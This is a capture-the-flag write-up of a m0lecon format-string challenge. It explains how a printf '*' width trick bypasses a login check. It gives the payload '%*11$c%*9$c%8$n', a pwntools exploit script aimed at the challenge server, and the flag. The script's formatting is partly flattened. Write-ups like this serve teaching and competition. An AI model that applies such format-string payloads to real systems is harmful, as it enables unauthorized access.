Tags: printf

Rating: 5.0

# Yet Another Login (19 solves, 225 points)
by FeDEX


Just another another simple login bypass challenge.

nc challs.m0lecon.it 5556

Author: Alberto247


This challenge is similar to the "Another Login" challenge, the only difference is that the seed is cleared from the stack and there is no way we can leak it anymore.
In this case, we need to think of another trick in order to bypass the login. Given that the input size is quite short (19 bytes) wee don't have the comfort to overwrite pointers and corrupt values on the stack as this approach would be too long.
Thus, the technique we can up with is to use * trick which would allow us to take the padding length from the stack and when we can write it in the sum variable thus bypass all conditions.
So, we just need to send 16 times the following payload: %*11$c%*9$c%8$n python from pwn import remote #pip install pwntools from hashlib import sha256 def solvepow(p, n): s = p.recvline() starting = s.split(b'with ')[1][:10].decode() s1 = s.split(b'in ')[-1][:n] i = 0 print("Solving PoW...") while True: if sha256((starting+str(i)).encode('ascii')).hexdigest()[-n:] == s1.decode(): print("Solved!") p.sendline(starting + str(i)) break i += 1 def exploit(p): #p.interactive() for i in range(16): p.recvuntil("Give") print(p.recvline()) p.sendline("%*11$c%*9$c%8$n")
print("Got shell!")
p.interactive()

if __name__ == '__main__':
p = remote('challs.m0lecon.it', 5556)
solvepow(p, n = 5)
exploit(p)


- flag: ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}